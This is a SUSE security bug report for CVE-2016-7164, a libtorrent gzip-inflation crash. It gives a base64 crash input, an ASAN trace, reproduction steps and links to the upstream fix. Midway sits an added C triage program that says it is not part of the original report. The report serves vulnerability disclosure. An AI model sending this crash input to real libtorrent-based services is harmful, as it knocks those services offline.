Bug 997820 (CVE-2016-7164) - VUL-0: CVE-2016-7164: libtorrent: inflate_gzip denial of service
Summary: VUL-0: CVE-2016-7164: libtorrent: inflate_gzip denial of service
Status: RESOLVED FIXED
Alias: CVE-2016-7164
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other
OS: openSUSE 42.1
Priority: P3 - Medium
Severity: Normal
Target Milestone: ---
Assignee: Alexei Sorokin
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/172440/
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2016-09-08 07:27 UTC by Victor Pereira
Modified: 2017-03-07 12:50 UTC

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
PoC (1.53 KB, text/plain)
2016-09-08 07:27 UTC, Victor Pereira

Description Victor Pereira 2016-09-08 07:27:49 UTC
Created attachment 691332
PoC

CVE-2016-7164

libtorrent version (or branch): 1.1.0.0


The issue was found with "afl fuzzer" while executing a modified version of the "test_gzip" testsuite with the following input data (displayed in base64 format):

H4sIAAjjYGJiWXWAAAAAYFlZWVlZWV34+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4AP4I
DAgLy5kMWQP/YmIA/wUAmQxZBf9iYgD/BQD/ALy8IAAAl5eXl5eXl5eXl5eXl5eXAABZWVlZWVlZ
Xfj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+PgA/ggMCAvLmQxZA/9iYgD/BQCZDFkF/2Ji
AP8FAP8AvLwgAACXl5eXl5eXl5eXl5eXl5cAAFlZWVlZWVlZAPoIDAgLy5kMWQX/YmIA/wUAWVlZ
WVlZWVlZAID//1lZWVlZWVkA+ggMCAvLmQxZBf9iYgD/BQBZWVlZWVlZWVkAgP//YmJiEARkQPZZ
WVlZWQwMDIsIAEQ=

A segmentation fault signal was captured while running:
./test_gzip gzip_data
The output from ASAN:

ASAN:SIGSEGV
=================================================================
==28954==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000048cb19 sp 0x7ffe24a458b0 bp 0x000000000000 T0)
    #0 0x48cb18 in construct(huffman*, short*, int) /home/user/libtorrent-rasterbar-1.1.0/src/puff.cpp:365
    #1 0x494c77 in dynamic /home/user/libtorrent-rasterbar-1.1.0/src/puff.cpp:693
    #2 0x494c77 in puff(unsigned char*, unsigned int*, unsigned char const*, unsigned int*) /home/user/libtorrent-rasterbar-1.1.0/src/puff.cpp:781
    #3 0x489f71 in libtorrent::inflate_gzip(char const*, int, std::vector<char, std::allocator<char> >&, int, boost::system::error_code&) /home/user/libtorrent-rasterbar-1.1.0/src/gzip.cpp:230
    #4 0x482aed in main /home/user/libtorrent-rasterbar-1.1.0/examples3/test_gzip.cpp:84
    #5 0x7f8f1ede1f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    #6 0x48025c in _start (/tmp/fuzz_gzip/test_gzip+0x48025c)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/user/libtorrent-rasterbar-1.1.0/src/puff.cpp:365 construct(huffman*, short*, int)
==28954==ABORTING
The issue seems to be located in the puff.cpp file inside the "construct" function.

To reproduce:
1. compile "test_gzip.cpp" (here attached)
2. copy the base64 encoded data to a file (ex. gzip_data.b64)
3. decode the file to a new file ("base64 -d gzip_data.b64 > gzip_data")
4. run ./test_gzip gzip_data


References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7164
http://seclists.org/oss-sec/2016/q3/443
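The report gives the crashing input and the stack trace but not what that input looks like to the inflater. As an added triage aid (this is not code from the bug report, the attachment, or libtorrent), the C program below decodes the base64 quoted above, parses the RFC 1952 gzip member header the way a gzip wrapper such as libtorrent's gzip.cpp has to before handing the payload to puff(), and then reads the first RFC 1951 block header from the payload. On this input the member header is the plain 10-byte form (CM=8, FLG=0) and the payload opens with a final dynamic-Huffman block (BTYPE=2) whose eight transmitted code-length code lengths are all zero, which is consistent with the dynamic() -> construct() frames in the ASAN trace: the wrapper accepts the stream and the very first table construction already sees a degenerate alphabet. The base64 decoder, the two parsers, and the names poc_header()/poc_first_block() are this example's own, not libtorrent's API; the only data taken from the page is the base64 string.

```c
/* Added triage example, not part of the bug report or of libtorrent:
 * decode the PoC, parse the gzip header (RFC 1952) and the first
 * DEFLATE block header (RFC 1951) to see what puff() is handed. */
#include <stdint.h>
#include <stdio.h>

/* Base64 exactly as quoted in the report. */
static const char *poc_b64 =
    "H4sIAAjjYGJiWXWAAAAAYFlZWVlZWV34+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4AP4I"
    "DAgLy5kMWQP/YmIA/wUAmQxZBf9iYgD/BQD/ALy8IAAAl5eXl5eXl5eXl5eXl5eXAABZWVlZWVlZ"
    "Xfj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+PgA/ggMCAvLmQxZA/9iYgD/BQCZDFkF/2Ji"
    "AP8FAP8AvLwgAACXl5eXl5eXl5eXl5eXl5cAAFlZWVlZWVlZAPoIDAgLy5kMWQX/YmIA/wUAWVlZ"
    "WVlZWVlZAID//1lZWVlZWVkA+ggMCAvLmQxZBf9iYgD/BQBZWVlZWVlZWVkAgP//YmJiEARkQPZZ"
    "WVlZWQwMDIsIAEQ=";

static int b64val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decodes base64 (whitespace ignored, stops at '='); returns byte count or -1. */
static int b64decode(const char *in, uint8_t *out, int cap)
{
    uint32_t acc = 0;
    int nbits = 0, n = 0;
    for (; *in && *in != '='; in++) {
        if (*in == '\n' || *in == '\r' || *in == ' ') continue;
        int v = b64val((unsigned char)*in);
        if (v < 0) return -1;
        acc = (acc << 6) | (uint32_t)v;
        nbits += 6;
        if (nbits >= 8) {
            nbits -= 8;
            if (n >= cap) return -1;
            out[n++] = (uint8_t)(acc >> nbits);   /* top 8 of the pending bits */
            acc &= (1u << nbits) - 1;
        }
    }
    return n;
}

struct gz_hdr { int ok, method, flags, hdr_len; };  /* hdr_len = payload offset */

/* Walks the RFC 1952 member header, including the optional FLG-driven fields. */
static struct gz_hdr gz_parse_header(const uint8_t *p, int n)
{
    struct gz_hdr h = {0, 0, 0, 0};
    int off = 10;
    if (n < 10 || p[0] != 0x1f || p[1] != 0x8b) return h;   /* ID1, ID2 */
    h.method = p[2];                                           /* CM: 8 = deflate */
    h.flags = p[3];
    if (h.flags & 0x04) {                          /* FEXTRA: XLEN (LE16) + data */
        if (off + 2 > n) return h;
        off += 2 + (p[off] | (p[off + 1] << 8));
    }
    if (h.flags & 0x08) { while (off < n && p[off]) off++; off++; }  /* FNAME */
    if (h.flags & 0x10) { while (off < n && p[off]) off++; off++; }  /* FCOMMENT */
    if (h.flags & 0x02) off += 2;                                    /* FHCRC */
    if (off > n) return h;
    h.hdr_len = off;
    h.ok = 1;
    return h;
}

struct bitrd { const uint8_t *p; int n, pos, bit; };

/* Reads k bits LSB-first as RFC 1951 requires; -1 if the stream ends. */
static int getbits(struct bitrd *r, int k)
{
    int v = 0;
    for (int i = 0; i < k; i++) {
        if (r->pos >= r->n) return -1;
        v |= ((r->p[r->pos] >> r->bit) & 1) << i;
        if (++r->bit == 8) { r->bit = 0; r->pos++; }
    }
    return v;
}

/* btype: 0 stored, 1 fixed, 2 dynamic, 3 reserved. hlit/hdist/hclen are the
 * decoded counts (HLIT+257, HDIST+1, HCLEN+4); clen_sum sums the transmitted
 * 3-bit code-length code lengths, so 0 means that alphabet has no codes. */
struct blk_hdr { int truncated, bfinal, btype, hlit, hdist, hclen, clen_sum; };

static struct blk_hdr parse_first_block(const uint8_t *p, int n)
{
    struct bitrd r = { p, n, 0, 0 };
    struct blk_hdr b = { 0, -1, -1, 0, 0, 0, 0 };
    b.bfinal = getbits(&r, 1);
    b.btype = getbits(&r, 2);
    if (b.bfinal < 0 || b.btype < 0) { b.truncated = 1; return b; }
    if (b.btype != 2) return b;               /* only dynamic blocks carry tables */
    int hlit = getbits(&r, 5), hdist = getbits(&r, 5), hclen = getbits(&r, 4);
    if (hlit < 0 || hdist < 0 || hclen < 0) { b.truncated = 1; return b; }
    b.hlit = hlit + 257; b.hdist = hdist + 1; b.hclen = hclen + 4;
    for (int i = 0; i < b.hclen; i++) {       /* order 16,17,18,0,8,7,9,6,... */
        int v = getbits(&r, 3);
        if (v < 0) { b.truncated = 1; return b; }
        b.clen_sum += v;
    }
    return b;
}

/* Wrappers over the embedded PoC (assumed helper names, not libtorrent's). */
static struct gz_hdr poc_header(void)
{
    uint8_t buf[512];
    struct gz_hdr bad = {0, 0, 0, 0};
    int n = b64decode(poc_b64, buf, (int)sizeof buf);
    return n < 0 ? bad : gz_parse_header(buf, n);
}

static struct blk_hdr poc_first_block(void)
{
    uint8_t buf[512];
    struct blk_hdr bad = {1, -1, -1, 0, 0, 0, 0};
    int n = b64decode(poc_b64, buf, (int)sizeof buf);
    if (n < 0) return bad;
    struct gz_hdr h = gz_parse_header(buf, n);
    if (!h.ok) return bad;
    return parse_first_block(buf + h.hdr_len, n - h.hdr_len);
}

int main(void)
{
    struct gz_hdr h = poc_header();
    struct blk_hdr b = poc_first_block();
    printf("gzip: ok=%d method=%d flags=0x%02x payload offset=%d\n",
           h.ok, h.method, h.flags, h.hdr_len);
    printf("first block: bfinal=%d btype=%d hlit=%d hdist=%d hclen=%d "
           "clen_sum=%d truncated=%d\n",
           b.bfinal, b.btype, b.hlit, b.hdist, b.hclen, b.clen_sum, b.truncated);
    return 0;
}
```

Build with `cc -std=c99 -Wall poc_triage.c` and run it with no arguments; the PoC is embedded, so neither the attachment nor libtorrent is needed. The same two parsers can be pointed at any other fuzzer finding against inflate_gzip to tell wrapper-level rejects (bad magic, truncated optional fields) from inputs that actually reach the DEFLATE decoder.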
Comment 1 Victor Pereira 2016-09-08 07:28:43 UTC
full discussion and patch proposal: 

https://github.com/arvidn/libtorrent/issues/1021
https://github.com/arvidn/libtorrent/pull/1022
Comment 2 Swamp Workflow Management 2016-09-08 22:00:15 UTC
bugbot adjusting priority
Comment 3 Jan Engelhardt 2016-09-17 20:45:08 UTC
I am not the maintainer for arvidn-libtorrent.
Comment 4 Alexei Sorokin 2017-03-07 12:50:01 UTC
That was fixed.